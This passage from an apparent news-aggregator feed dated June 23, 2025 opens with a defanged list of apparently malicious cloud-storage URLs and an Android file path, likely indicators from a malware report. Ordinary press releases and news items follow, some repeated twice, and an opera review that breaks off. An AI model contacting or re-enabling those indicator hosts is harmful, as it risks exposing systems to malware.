    hxxps://zx-afjweiofwe.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
    hxxps://dxifjew2.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
    hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
    hxxps://data-sdk2.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121
    hxxps://1111333[.]cn-bj.ufileos[.]com/file/SGTMnH951121
    hxxps://tbetter-oss.oss-accelerate.aliyuncs[.]com/ip/CF4J7aWKeF8yKVKu
    hxxps://photo-php-all.s3[.]ap-southeast-1.amazonaws[.]com/app/domain.json
    hxxps://c1mon-oss.oss-cn-hongkong.aliyuncs[.]com/J2A3SWc2YASfQ2
    hxxps://tbetter-oss.oss-cn-guangzhou.aliyuncs[.]com/ip/JZ24J7aYCeNGyKVF2
    hxxps://data-sdk.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121

    Paths

    /sdcard/aray/cache/devices/.DEVICES

    MIL OSI Global Banks –

    June 23, 2025
  • MIL-OSI: Bitget Onboards on India’s I4C’s Sahyog Portal to Support Local Law Enforcement

    Source: GlobeNewswire (MIL-OSI)

    NEW DELHI, June 23, 2025 (GLOBE NEWSWIRE) — Bitget, the leading cryptocurrency exchange and Web3 company, has officially onboarded onto India’s Sahyog portal, a key interface under the Indian Cyber Crime Coordination Centre (I4C) framework. The portal facilitates direct and structured communication between law enforcement agencies and digital service providers. This development marks an important step in enhancing cooperation between virtual asset platforms and Indian authorities engaged in cybercrime investigations.

    The Sahyog portal serves as a centralized system that allows law enforcement to submit legal requests for data disclosure in accordance with Section 94 of the Bharatiya Nagarik Suraksha Sanhita (BNSS) and Section 79(3)(b) of the Information Technology Act. These provisions enable Indian authorities to seek access to digital evidence, user data, and transaction records from service providers in connection with active investigations. Bitget’s integration ensures that future requests can be managed through an established, secure, and legally compliant channel.

    Global exchanges are being actively onboarded onto the Sahyog system to improve investigative capabilities and reduce procedural delays. Alongside Bitget, other major global platforms have also been onboarded onto the Sahyog system in furtherance of the system’s robustness. The main aim is to provide investigators with aggregated access to essential data that supports timely enforcement actions in cases involving virtual assets.

    Bitget has taken multiple steps in recent months  to align with regional compliance frameworks across key jurisdictions, with India representing a particularly strategic market. Participation in official law enforcement portals is a good example of Bitget’s  proactive stance in aligning operations with local regulatory expectations. It aligns with the exchange’s broader aim to assist in creating a transparent and accountable environment for digital asset trading, particularly as authorities globally increase scrutiny of crypto transactions.

    “Operating responsibly in all jurisdictions remains a priority for Bitget. India’s regulatory and enforcement landscape around digital assets is evolving quickly, and aligning with initiatives like Sahyog highlights a practical step forward. Bitget will continue to engage constructively with local regulators to ensure that our systems deliver the legal and technical requirements to support such agencies,” said Hon NG, Chief Legal Officer at Bitget.

    As the global digital asset sector expands, increased engagement between crypto service providers and governments has become important to operate sustainably. Integration into frameworks such as Sahyog allows exchanges like Bitget to deliver timely and structured responses to legal requests, reducing friction in cross-border cooperation and ensuring that law enforcement agencies have access to the tools necessary for digital evidence collection.

    India’s growing emphasis on formalizing its approach to virtual assets has brought renewed focus on the role of foreign exchanges operating within its borders. Compliance with data disclosure provisions and participation in platforms like Sahyog are expected to play an important role in defining the future relationship between crypto firms and national authorities. Bitget’s onboarding adds to the growing list of global entities now accessible via Sahyog, signaling the broader direction of increased regulatory coordination across the industry.

    About Bitget

    Established in 2018, Bitget is the world’s leading cryptocurrency exchange and Web3 company. Serving over 120 million users in 150+ countries and regions, the Bitget exchange is committed to helping users trade smarter with its pioneering copy trading feature and other trading solutions, while offering real-time access to Bitcoin price, Ethereum price, and other cryptocurrency prices. Formerly known as BitKeep, Bitget Wallet is a leading non-custodial crypto wallet supporting 130+ blockchains and millions of tokens. It offers multi-chain trading, staking, payments, and direct access to 20,000+ DApps, with advanced swaps and market insights built into a single platform. Bitget is at the forefront of driving crypto adoption through strategic partnerships, such as its role as the Official Crypto Partner of the World’s Top Football League, LALIGA, in EASTERN, SEA and LATAM markets, as well as a global partner of Turkish National athletes Buse Tosun Çavuşoğlu (Wrestling world champion), Samet Gümüş (Boxing gold medalist) and İlkin Aydın (Volleyball national team), to inspire the global community to embrace the future of cryptocurrency.

    For more information, visit: Website | Twitter | Telegram | LinkedIn | Discord | Bitget Wallet

    For media inquiries, please contact: media@bitget.com

    Risk Warning: Digital asset prices are subject to fluctuation and may experience significant volatility. Investors are advised to only allocate funds they can afford to lose. The value of any investment may be impacted, and there is a possibility that financial objectives may not be met, nor the principal investment recovered. Independent financial advice should always be sought, and personal financial experience and standing carefully considered. Past performance is not a reliable indicator of future results. Bitget accepts no liability for any potential losses incurred. Nothing contained herein should be construed as financial advice. For further information, please refer to our Terms of Use.

    A photo accompanying this announcement is available at https://www.globenewswire.com/NewsRoom/AttachmentNg/0956e457-f148-4c31-b579-b6261058c890

    The MIL Network –

    June 23, 2025
  • MIL-OSI Asia-Pac: HKMA and HKAB launch “Smart Seniors Anti-Scam Ambassador Programme”

    Source: Hong Kong Government special administrative region

    The following is issued on behalf of the Hong Kong Monetary Authority:

    The Hong Kong Monetary Authority (HKMA) and the Hong Kong Association of Banks (HKAB) today (June 23) jointly organised the launch ceremony for the “Smart Seniors Anti-Scam Ambassador Programme” at Nga Yin Association Neighbourhood Elderly Centre of the Neighbourhood Advice-Action Council to kick start the anti-scam publicity programme for the elderly in the second half of the year.

    The HKMA and the banking industry have been conducting anti-scam education and publicity through various channels. The “Smart Seniors Anti-Scam Ambassador Programme” aims to enhance the anti-scam awareness of the elderly. Through visits to elderly centres across all 18 districts in Hong Kong, the programme encourages the elderly to become anti-scam ambassadors and share scam prevention messages with their family and friends.

    At the launch ceremony, the HKMA introduced “Money Safe” and other anti-scam measures. With the support of the banking industry, 14 banks (see Annex) will implement interim “Money Safe” measures for the elderly and other customers (Note) by the end of June to provide extra protection to bank deposits. All retail banks will fully implement “Money Safe” by the end of this year.

    Two promotional videos themed after vintage Cantonese movies were debuted at the event. The videos deploy the mnemonic “Three Anti-Scam Tactics” – “Keep Calm, Give Nothing, Verify and Seek Help”, and remind the elderly that scams are often old tricks in new disguises.

         Deputy Chief Executive of the HKMA Mr Arthur Yuen said, “The HKMA attaches great importance to scam prevention work for the elderly. Through the ‘Smart Seniors Anti-Scam Ambassador Programme’, we hope to reach out to the community and convey anti-scam messages to more seniors through the elderly ambassadors. We also encourage the elderly to make good use of ‘Money Safe’ and various anti-scam measures provided by banks to better protect themselves.”

         The Chairperson of the HKAB, Ms Mary Huen, said, “Strengthening consumer and investor protection is a top priority for the HKAB. The banking industry has been working closely with the HKMA on anti-fraud efforts and actively implementing measures to ensure the smooth launch of ‘Money Safe’. Earlier this year, we established a dedicated ‘Anti-Fraud Education Taskforce’ to co-ordinate diverse outreach activities and educational programmes targeting various vulnerable groups within the community. We expect over 100 relevant activities will be arranged throughout the year to comprehensively enhance public awareness of fraud prevention.”

    Note: During the interim period, some banks only offer “Money Safe” to customers aged 65 or above and service details (such as applicable account types) may also vary among banks. Please contact individual banks for details.

    MIL OSI Asia Pacific News –

    June 23, 2025
  • MIL-OSI Asia-Pac: IAC presents deep-sea adventure in exciting and hilarious Korean multimedia theatre performance “Waiting!” in August (with photos)

    Source: Hong Kong Government special administrative region

    IAC presents deep-sea adventure in exciting and hilarious Korean multimedia theatre performance “Waiting!” in August  
         The story of “Waiting!” begins with a young girl, Bada, who longs to reunite with her fisherman father and unexpectedly embarks on an exciting and hilarious deep-sea adventure. After setting out alone to find her dad, Bada is swallowed by a whale, which takes her to its dark belly where she dances with various glowing underwater creatures.
     
         Using cardboard props and blacklight effects, the programme is set against the backdrop of a magnificent ship and vast ocean. With lively and humorous performances by the cast, the amazing show is full of fun and imagination without the need for words.
     
         Korean art group HADDANGSE, established in 2008, dedicates itself to creating imaginative and community-oriented theatrical works. The group emphasises audience participation, inviting viewers to become co-creators of the performance and experience the magic of immersive theatre. “Waiting!” has won the 2024 International Association of Theatre & Performing Arts for Children & Young People Seoul Children’s Theatre Grand Prize and Best Director Award.
     
         “Waiting!” will be staged at 7.30pm on August 1, 11am and 3pm on August 2, and 3pm on August 3 at the Hong Kong Cultural Centre Studio Theatre. Tickets priced at $280 and $340 are now available at URBTIX (www.urbtix.hk 
         For programme enquiries and concessionary schemes, please call 2370 1044 or visit the IAC website (
    www.hkiac.gov.hk 
         This year’s IAC will run from July 11 to August 17, featuring a wide array of fun-filled educational programmes by overseas, Mainland and local art groups and artists. In addition to martial arts, acrobatics, dance, music, theatre and multimedia, the IAC will also offer film screenings, parent-child workshops, an online programme, an outreach performance and an exhibition.
    Issued at HKT 15:00

    NNNN

    CategoriesMIL-OSI

    MIL OSI Asia Pacific News –

    June 23, 2025
  • Israeli forces recover bodies of three hostages from Gaza

    Source: Government of India

    Source: Government of India (4)

    Israeli forces have recovered the bodies of three hostages which had been held in the Gaza Strip since the Palestinian militant group Hamas’ 2023 attack, the military and Prime Minister Benjamin Netanyahu said on Sunday.

    The hostages were identified as civilians Ofra Keidar and Yonatan Samerano, and soldier Shay Levinson. All were killed on the day of the attack, on October 7, 2023, the military said.

    With their retrieval, 50 hostages now remain in Gaza, only 20 of whom are believed to be alive.

    The abduction of Samerano, 21 at the time of his death, by a man later identified by Israeli officials as a worker at the U.N.’s Palestinian refugee agency UNRWA, was caught on CCTV.

    Around 1,200 people were killed and 251 taken hostage during the Hamas-led attack on southern Israel, according to Israeli authorities.

    The subsequent Israeli campaign against Hamas in Gaza has since killed more than 55,000 Palestinians, according to health authorities in the Hamas-run strip, displaced almost the entire 2.3 million population, plunged the enclave into humanitarian crisis and left much of the territory in ruins.

    (Reuters)

    June 23, 2025
  • MIL-OSI: Boyuan Capital (investment platform under Bosch Group) and Galbot Forged JV

    Source: GlobeNewswire (MIL-OSI)

    BEIJING, June 23, 2025 (GLOBE NEWSWIRE) — On June 17, 2025, Boyuan Capital (the market-oriented investment platform under the Bosch Group), announced a joint venture named BOYIN INNOVATION ALLIANCE with Galbot, a market leading innovator in building general-purpose humanoid robots powered by Embodied AI.

    The collaboration was officially unveiled at the “Open Bosch: Embodied AI Day” event on June 17. On the same day, Bosch China, Boyuan Capital, and Galbot signed a strategic memorandum of understanding (MOU) to jointly advance the R&D and commercialization of Embodied Intelligent Robotics.

    The joint venture will focus on industrial applications with Embodied AI in high-precision manufacturing—such as complex assembly— aiming at promoting the large-scale industrial deployment of Embodied AI and accelerating the global adoption of Embodied AI technologies. It will leverage Galbot’s proprietary Embodied AI technology, replace traditional rule-based and programmed automation deployment methods with Embodied AI models trained on real industrial scenario data, and develop next-generation intelligent robot systems for industrial scenarios. This initiative marks a significant milestone in transitioning Embodied AI from pilot testing to scaled industrial deployment, aligning with the global acceleration of smart manufacturing.

    Galbot: A pioneer in Embodied AI

    Galbot—recognized by The Information as one of the Top Asia Startups of 2024 has emerged as a leader in Embodied AI. Galbot is Founded in May 2023 by Prof. He Wang from Peking University, who gained his PhD from Stanford.

    At the event, Galbot demonstrated its Embodied AI robots, showcasing fully autonomous capabilities in complex automotive and retail scenarios. The live demonstrations received widespread acclaim from key partners, including Bosch China, BoYuan Capital and United Automotive Electronic Systems (UAES), underscoring the maturity of Galbot’s Embodied AI technologies.

    These demonstrations showcased the maturity of Galbot’s technology stack, which includes: End-to-End VLA (Vision-Language-Action) Large Models with strong generalization capabilities; A proprietary simulation dataset containing over 10 billion high-quality robotic action data points; Advanced hardware systems featuring high-precision control and scenario adaptability.

    Strategic Collaboration and Global Reach

    As a key early milestone, BOYIN INNOVATION ALLIANCE signed a memorandum of understanding with UAES to establish RoboFab, a joint laboratory dedicated to cultivating automotive-operations related expertise in Embodied AI and redefining industrialization.

    “Embodied AI holds transformative potential to redefine manufacturing processes. We’re already witnessing its remarkable capabilities across diverse production stages. Through this powerful synergy between Boyuan Capital and Galbot, we anticipate delivering commercially viable, scalable robotics solutions with real industry impact,” said Dr. Ingo Ramesohl, Managing Partner of Bosch Ventures.

    “The future of manufacturing lies in intelligent, adaptive systems that can learn from real-world data,” said Professor He Wang, founder of Galbot. “Through this collaboration with Bosch and Boyuan Capital, we’re building an end-to-end value chain that will deliver globally competitive Embodied AI solutions for smart manufacturing.”

    The joint venture adopts a “global design, local production” strategy, positioning it to serve key international markets including Europe, North America, and Southeast Asia.

    Industry analysts view this collaboration as a significant development in the Embodied AI sector, potentially accelerating the industrialization of AI-driven robot system in manufacturing. The partnership brings together complementary strengths: Bosch’s industrial experience, Boyuan’s financial resources and eco-system, and Galbot’s technological innovations in Embodied AI.

    Contact Person: Xiaokang Li
    Email: business@galbot.com

    A photo accompanying this announcement is available at https://www.globenewswire.com/NewsRoom/AttachmentNg/8ba8b74d-508b-4a6f-b65f-3dc9bb26b9fa

    The MIL Network –

    June 23, 2025
  • MIL-OSI: Boyuan Capital (investment platform under Bosch Group) and Galbot Forged JV

    Source: GlobeNewswire (MIL-OSI)

    BEIJING, June 23, 2025 (GLOBE NEWSWIRE) — On June 17, 2025, Boyuan Capital (the market-oriented investment platform under the Bosch Group), announced a joint venture named BOYIN INNOVATION ALLIANCE with Galbot, a market leading innovator in building general-purpose humanoid robots powered by Embodied AI.

    The collaboration was officially unveiled at the “Open Bosch: Embodied AI Day” event on June 17. On the same day, Bosch China, Boyuan Capital, and Galbot signed a strategic memorandum of understanding (MOU) to jointly advance the R&D and commercialization of Embodied Intelligent Robotics.

    The joint venture will focus on industrial applications with Embodied AI in high-precision manufacturing—such as complex assembly— aiming at promoting the large-scale industrial deployment of Embodied AI and accelerating the global adoption of Embodied AI technologies. It will leverage Galbot’s proprietary Embodied AI technology, replace traditional rule-based and programmed automation deployment methods with Embodied AI models trained on real industrial scenario data, and develop next-generation intelligent robot systems for industrial scenarios. This initiative marks a significant milestone in transitioning Embodied AI from pilot testing to scaled industrial deployment, aligning with the global acceleration of smart manufacturing.

    Galbot: A pioneer in Embodied AI

    Galbot—recognized by The Information as one of the Top Asia Startups of 2024 has emerged as a leader in Embodied AI. Galbot is Founded in May 2023 by Prof. He Wang from Peking University, who gained his PhD from Stanford.

    At the event, Galbot demonstrated its Embodied AI robots, showcasing fully autonomous capabilities in complex automotive and retail scenarios. The live demonstrations received widespread acclaim from key partners, including Bosch China, BoYuan Capital and United Automotive Electronic Systems (UAES), underscoring the maturity of Galbot’s Embodied AI technologies.

    These demonstrations showcased the maturity of Galbot’s technology stack, which includes: End-to-End VLA (Vision-Language-Action) Large Models with strong generalization capabilities; A proprietary simulation dataset containing over 10 billion high-quality robotic action data points; Advanced hardware systems featuring high-precision control and scenario adaptability.

    Strategic Collaboration and Global Reach

    As a key early milestone, BOYIN INNOVATION ALLIANCE signed a memorandum of understanding with UAES to establish RoboFab, a joint laboratory dedicated to cultivating automotive-operations related expertise in Embodied AI and redefining industrialization.

    “Embodied AI holds transformative potential to redefine manufacturing processes. We’re already witnessing its remarkable capabilities across diverse production stages. Through this powerful synergy between Boyuan Capital and Galbot, we anticipate delivering commercially viable, scalable robotics solutions with real industry impact,” said Dr. Ingo Ramesohl, Managing Partner of Bosch Ventures.

    “The future of manufacturing lies in intelligent, adaptive systems that can learn from real-world data,” said Professor He Wang, founder of Galbot. “Through this collaboration with Bosch and Boyuan Capital, we’re building an end-to-end value chain that will deliver globally competitive Embodied AI solutions for smart manufacturing.”

    The joint venture adopts a “global design, local production” strategy, positioning it to serve key international markets including Europe, North America, and Southeast Asia.

    Industry analysts view this collaboration as a significant development in the Embodied AI sector, potentially accelerating the industrialization of AI-driven robot system in manufacturing. The partnership brings together complementary strengths: Bosch’s industrial experience, Boyuan’s financial resources and eco-system, and Galbot’s technological innovations in Embodied AI.

    Contact Person: Xiaokang Li
    Email: business@galbot.com

    A photo accompanying this announcement is available at https://www.globenewswire.com/NewsRoom/AttachmentNg/8ba8b74d-508b-4a6f-b65f-3dc9bb26b9fa

    The MIL Network –

    June 23, 2025
  • Oil surges to five-month high after US hits Iran’s key nuclear sites

    Source: Government of India

    Source: Government of India (4)

    Oil prices jumped on Monday to their highest since January as the United States’ weekend move to join Israel in attacking Iran’s nuclear facilities stoked supply concerns.

    Brent crude futures were up $1.52 or 1.97% to $78.53 a barrel as of 0503 GMT. U.S. West Texas Intermediate crude advanced $1.51 or 2.04% to $75.35.

    Both contracts jumped by more than 3% earlier in the session to $81.40 and $78.40, respectively, touching five-month highs before giving up some gains.

    The rise in prices came after U.S. President Donald Trump said he had “obliterated” Iran’s main nuclear sites in strikes over the weekend, joining an Israeli assault in an escalation of conflict in the Middle East as Tehran vowed to defend itself.

    Iran is OPEC’s third-largest crude producer.

    Market participants expect further price gains amid mounting fears that an Iranian retaliation may include a closure of the Strait of Hormuz, through which roughly a fifth of global crude supply flows.

    “The current geopolitical escalation provides the fundamental catalyst for (Brent) prices to traverse higher and potentially spiral towards $100, with $120 per barrel appearing increasingly plausible,” said Sugandha Sachdeva, founder of New Delhi-based research firm SS WealthStreet.

    Iran’s Press TV reported that the Iranian parliament had approved a measure to close the strait. Iran has in the past threatened to close the strait but has never followed through.

    Iran and Israel exchanged air and missile strikes on Monday, as global tensions rose over Tehran’s expected response to a U.S. attack on its nuclear facilities.

    “The risks of damage to oil infrastructure … have multiplied,” said Sparta Commodities senior analyst June Goh.

    Although there are alternative pipeline routes out of the region, there will still be crude volume that cannot be fully exported out if the Strait of Hormuz becomes inaccessible. Shippers will increasingly stay out of the region, she added.

    Goldman Sachs said in a Sunday report that Brent could briefly peak at $110 per barrel if oil flows through the critical waterway were halved for a month, and remain down by 10% for the following 11 months.

    The bank still assumed no significant disruption to oil and natural gas supply, adding global incentives to try and prevent a sustained and very large disruption.

    Brent has risen 13% since the conflict began on June 13, while WTI has gained around 10%.

    Given the Strait of Hormuz is indispensable for Iran’s own oil exports, which are a vital source of its national revenues, a sustained closure would inflict severe economic damage on Iran itself, making it a double-edged sword, Sachdeva added.

    Meanwhile, Japan on Monday called for de-escalation of the conflict in Iran, while a South Korean vice industry minister voiced concern over the potential impact of the strikes on the country’s trade.

    (Reuters)

    June 23, 2025
  • MIL-OSI: 35/2025・Trifork Group: Weekly report on share buyback

    Source: GlobeNewswire (MIL-OSI)

    Company announcement no. 35 / 2025
    Schindellegi, Switzerland – 23 June 2025

    Trifork Group: Weekly report on share buyback

    On 28 February 2025, Trifork initiated a share buyback program in accordance with Regulation No. 596/2014 of the European Parliament and Council of 16 April 2014 (MAR) and Commission Delegated Regulation (EU) 2016/1052, (Safe Harbour regulation). The share buyback program runs from 4 March 2025 up to and including no later than 30 June 2025. For details, please see company announcement no. 7 of 28 February 2025.

    Under the share buyback program, Trifork will purchase shares for up to a total of DKK 14.92 million (approximately EUR 2 million). Prior to the launch of the share buyback, Trifork held 256,329 treasury shares, corresponding to 1.3% of the share capital. Under the program, the following transactions have been made:

            Number of shares        Average purchase price (DKK)        Transaction value (DKK)
    Total beginning 112,959 88.15 9,957,628
    16 June 2025 1,900 97.64 185,516
    17 June 2025 1,900 97.59 185,421
    18 June 2025 1,900 97.62 185,478
    19 June 2025 1,900 98.49 187,131
    20 June 2025 1,900 97.32 184,908
    Accumulated 122,459 88.90 10,886,082

    A detailed overview of the daily transactions can be found here: https://investor.trifork.com/trifork-shares/

    Since the share buyback program was started on 4 March 2025, the total number of repurchased shares is 122,459 at a total amount of DKK 10,886,082.
    On 25 March, 25 April and 23 May 2025, 4,370 shares acquired through the share buyback program were utilized for the Executive Management’s monthly fixed salary, representing a change from cash payment to payment partly in shares (refer to company announcement no. 1 of 21 January 2025). On 1 April 2025, 19,943 shares acquired through the share buyback program were utilized to serve the RSU plan of Executive Management and certain employees.

    With the transactions stated above, Trifork holds a total of 354,475 treasury shares, corresponding to 1.8%. The total number of registered shares in Trifork is 19,744,899. Adjusted for treasury shares, the number of outstanding shares is 19,390,424.


    Investor and media contact

    Frederik Svanholm, Group Investment Director, frsv@trifork.com, +41 79 357 73 17

    About Trifork
    Trifork (Nasdaq Copenhagen: TRIFOR) is a pioneering global technology company, empowering enterprise and public sector customers with innovative digital products and solutions. With 1,215 professionals across 71 business units in 16 countries, Trifork specializes in designing, building, and operating advanced software across sectors such as public administration, healthcare, manufacturing, logistics, energy, financial services, retail, and real estate. The Group’s R&D arm, Trifork Labs, drives innovation by investing in and developing synergistic, high-potential technology companies. Learn more at trifork.com.

    Attachment

    • CA_35_25_Buyback

    The MIL Network –

    June 23, 2025
  • MIL-OSI: 35/2025・Trifork Group: Weekly report on share buyback

    Source: GlobeNewswire (MIL-OSI)

    Company announcement no. 35 / 2025
    Schindellegi, Switzerland – 23 June 2025

    Trifork Group: Weekly report on share buyback

    On 28 February 2025, Trifork initiated a share buyback program in accordance with Regulation No. 596/2014 of the European Parliament and Council of 16 April 2014 (MAR) and Commission Delegated Regulation (EU) 2016/1052, (Safe Harbour regulation). The share buyback program runs from 4 March 2025 up to and including no later than 30 June 2025. For details, please see company announcement no. 7 of 28 February 2025.

    Under the share buyback program, Trifork will purchase shares for up to a total of DKK 14.92 million (approximately EUR 2 million). Prior to the launch of the share buyback, Trifork held 256,329 treasury shares, corresponding to 1.3% of the share capital. Under the program, the following transactions have been made:

            Number of shares        Average purchase price (DKK)        Transaction value (DKK)
    Total beginning 112,959 88.15 9,957,628
    16 June 2025 1,900 97.64 185,516
    17 June 2025 1,900 97.59 185,421
    18 June 2025 1,900 97.62 185,478
    19 June 2025 1,900 98.49 187,131
    20 June 2025 1,900 97.32 184,908
    Accumulated 122,459 88.90 10,886,082

    A detailed overview of the daily transactions can be found here: https://investor.trifork.com/trifork-shares/

    Since the share buyback program was started on 4 March 2025, the total number of repurchased shares is 122,459 at a total amount of DKK 10,886,082.
    On 25 March, 25 April and 23 May 2025, 4,370 shares acquired through the share buyback program were utilized for the Executive Management’s monthly fixed salary, representing a change from cash payment to payment partly in shares (refer to company announcement no. 1 of 21 January 2025). On 1 April 2025, 19,943 shares acquired through the share buyback program were utilized to serve the RSU plan of Executive Management and certain employees.

    With the transactions stated above, Trifork holds a total of 354,475 treasury shares, corresponding to 1.8%. The total number of registered shares in Trifork is 19,744,899. Adjusted for treasury shares, the number of outstanding shares is 19,390,424.


    Investor and media contact

    Frederik Svanholm, Group Investment Director, frsv@trifork.com, +41 79 357 73 17

    About Trifork
    Trifork (Nasdaq Copenhagen: TRIFOR) is a pioneering global technology company, empowering enterprise and public sector customers with innovative digital products and solutions. With 1,215 professionals across 71 business units in 16 countries, Trifork specializes in designing, building, and operating advanced software across sectors such as public administration, healthcare, manufacturing, logistics, energy, financial services, retail, and real estate. The Group’s R&D arm, Trifork Labs, drives innovation by investing in and developing synergistic, high-potential technology companies. Learn more at trifork.com.

    Attachment

    • CA_35_25_Buyback

    The MIL Network –

    June 23, 2025
  • MIL-OSI Russia: Xinhua Analytical Center Report Highlights Fruitful Results of China-Central Asia Cooperation

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    Source: People’s Republic of China – State Council News

    ASTANA, June 23 (Xinhua) — China and Central Asian countries have deepened comprehensive cooperation, achieving successful results on a wide range of issues, according to a report released by the Xinhua Think Tank on Sunday.

    Tremendous achievements have been made in developing ties in seven key areas: economic and trade exchanges, infrastructure connectivity, energy cooperation, developing sectors, capacity building for development, mutual learning among civilizations, and peace and security, according to a report titled “Developing the Central Asia-China Spirit: Achievements, Possibilities and Prospects of Regional Cooperation” released by the Xinhua News Agency Research Institute, a think tank affiliated with the Xinhua News Agency.

    From rail corridors to renewable energy, from education to cultural exchanges, China-Central Asia cooperation is delivering real benefits on the ground, laying a stronger foundation for shared growth.

    According to the report, the volume and quality of trade and economic cooperation between China and Central Asian countries has increased in recent years, and China has become Central Asia’s largest trading partner and a significant source of investment.

    To promote sustainable growth, China and Central Asian countries have expanded cooperation in science, technology and education. The Lu Ban Workshop has become a new platform for cooperation in international vocational education. Based on local development needs, the Lu Ban Workshops in Central Asia have created demand-driven training models to promote regional poverty reduction and industrialization.

    Humanitarian exchanges are also flourishing. Central Asian tourism, culture and art festivals are growing in popularity in China. Chinese films and TV dramas have become hits in Central Asia. –0–

    MIL OSI Russia News –

    June 23, 2025
  • MIL-OSI Security: Appeal to locate suspect in high-value violin theft investigation

    Source: United Kingdom London Metropolitan Police

    Met officers investigating the theft of a high-value violin from a pub in Islington are appealing to the public to help trace the suspects.

    The violin was allegedly stolen on the evening of Tuesday, 18 February from The Marquess Tavern on Canonbury Street.

    The 30-year-old victim reported the theft to the Met that evening.

    PC Michael Collins, from the Met’s local policing team in Camden, said:

    “We’ve been working hard to try and locate the suspect and are releasing this CCTV in an effort to help identify them as soon as possible.

    “The victim, who is a member of London’s Philharmonia Orchestra, has told us the piece is worth more than £150,000 and was made in Florence in 1740.

    “It is incredibly precious, and for the victim, it’s priceless.

    “Please help us find the person responsible and have the violin returned it to its rightful owner.”

    If you recognise this person, or have any information which might help police with their investigation, please call 101 with the reference 01/7178074/25 or tweet the police via @MetCC.

    You can also call Crimestoppers anonymously on 0800 555 111 or online at www.crimestoppers-uk.org.

    MIL Security OSI –

    June 23, 2025
  • MIL-OSI Security: Appeal to locate suspect in high-value violin theft investigation

    Source: United Kingdom London Metropolitan Police

    Met officers investigating the theft of a high-value violin from a pub in Islington are appealing to the public to help trace the suspects.

    The violin was allegedly stolen on the evening of Tuesday, 18 February from The Marquess Tavern on Canonbury Street.

    The 30-year-old victim reported the theft to the Met that evening.

    PC Michael Collins, from the Met’s local policing team in Camden, said:

    “We’ve been working hard to try and locate the suspect and are releasing this CCTV in an effort to help identify them as soon as possible.

    “The victim, who is a member of London’s Philharmonia Orchestra, has told us the piece is worth more than £150,000 and was made in Florence in 1740.

    “It is incredibly precious, and for the victim, it’s priceless.

    “Please help us find the person responsible and have the violin returned it to its rightful owner.”

    If you recognise this person, or have any information which might help police with their investigation, please call 101 with the reference 01/7178074/25 or tweet the police via @MetCC.

    You can also call Crimestoppers anonymously on 0800 555 111 or online at www.crimestoppers-uk.org.

    MIL Security OSI –

    June 23, 2025
  • MIL-OSI Australia: Information sought over Pooraka arson

    Source: New South Wales – News

    Police are investigating a suspicious fire at a warehouse in Pooraka earlier this month.

    About 1am Saturday 14 June police and fire crews were called to a business on Main North Road after reports of a fire.

    Fire fighters quickly extinguished the blaze which caused minor internal damage to the building.

    CCTV from the incident shows a dark coloured vehicle, possibly a VN commodore, with light coloured mag wheels in the vicinity at the time of the fire.

    Police believe the fire was deliberately lit and ask anyone who recognises the car, who may have witnessed any suspicious activity or who may have CCTV or dashcam footage to assist with the investigation to anonymously provide information to Crime Stoppers online at https://crimestopperssa.com.au or free call 1800 333 000.

    Quote 25-84M.

    MIL OSI News –

    June 23, 2025
  • MIL-Evening Report: Myth meets modernity in Aphrodite, a striking opera that dissects the links between beauty, power and desire

    Source: The Conversation (Au and NZ) – By Laura Case, Lecturer in Musicology, Sydney Conservatorium of Music, University of Sydney

    Daniel Boud

    A new opera by American composer Nico Muhly is reimagining the myth of Aphrodite through a contemporary lens, exploring beauty, desire and identity in a strikingly relevant way.

    Aphrodite had its world premiere on Friday at Sydney’s Carriageworks arts precinct. The opera is directed by Alexander Berlage, performed by the Sydney Chamber Opera (in collaboration with Omega Ensemble), and features a sharp libretto by Melbourne playwright Laura Lethlean.

    It is a reflective production that challenges societal ideals and the enduring weight of cultural myths.

    A contemporary take on mythology

    Rather than simply retelling the myth, Nico Muhly’s Aphrodite engages in a creative dialogue with it. Through its protagonist Ava, an author and recently divorced mother of three, it interrogates the ideals and pressures associated with beauty and desirability.

    The story opens as Ava (Jessica O’Donoghue) returns to her hotel room after the premiere of a Netflix documentary based on her best-selling book, The Aphrodite Complex.

    Alone, Ava confronts personal insecurities, societal critiques, the fallout from her divorce, and fantasies of Hector, the young director of photography who worked on the documentary’s production with her in Athens.

    From her vulnerability emerges Aphrodite (Meechot Marrero) – a manifestation of the mythical Greek goddess, and a subconscious force embodying Ava’s desires and fears.

    Meechot Marrero is phenomenal as Aphrodite, embodying the goddess’s power.
    Daniel Boud

    Although it is brief (running for one hour) the opera’s plot is tightly focused. It centres on Ava’s emotional unravelling and her interaction with Aphrodite.

    The interplay between both characters blurs the boundaries between myth and reality, exploring how the stories we tell about ourselves, our culture, and our ideals, shape our identities.

    The opera poses profound questions. What does it means to be beautiful? Does beauty bestow power? How do societal expectations distort perceptions of self worth?

    Despite her academic expertise in deconstructing the Aphrodite myth, Ava finds herself trapped in the very ideals she critiques. This highlights the inescapable pull these ancient narratives continue to have in contemporary life.

    A visually stunning experience

    From the moment Ava steps on stage in a black tailored suit and heels, the opera’s modern aesthetic is unmistakable.

    The setting, designed by Isabel Hudson, is confined to a single hotel suite, including a bedroom, wardrobe and bathroom, with the bedroom backlit by a city skyline. Everyday details such as a flatscreen TV and a minibar cart create an atmosphere that feels both intimate and starkly contemporary.

    The opera, with its unmistakably contemporary setting, seems made with the modern viewer in mind.
    Daniel Boud

    A standout feature is the black-and-white screen above the stage. This screen displays subtitles for the English libretto, alongside live visuals of the performance (handled by video designer Morgan Moroney).

    The projections, captured by roving cameras, do more than just document the action. They add an artistic layer by focusing on intimate details, such as a hand gripping a thigh, or toes curling in a carpet.

    This visual storytelling evokes the voyeuristic tone of a music video or vintage film noir, accentuating the themes of scrutiny and self-perception. It reflects both the mythological obsession with beauty and the modern culture of constant observation.

    As the opera progresses, the visuals evolve. Toward the climax, earlier footage is replayed, creating a dynamic where Ava and Aphrodite must confront their own images. This layering transforms the cameras from passive observers into active participants.

    Musically engaging

    Muhly’s score is performed with technical brilliance by Omega Ensemble, and perfectly complements Lethlean’s libretto.

    Ava’s music alternates between structured and rhythmic patterns, reflecting her controlled persona – while more fragmented and fluid melodies mirror her internal struggles.

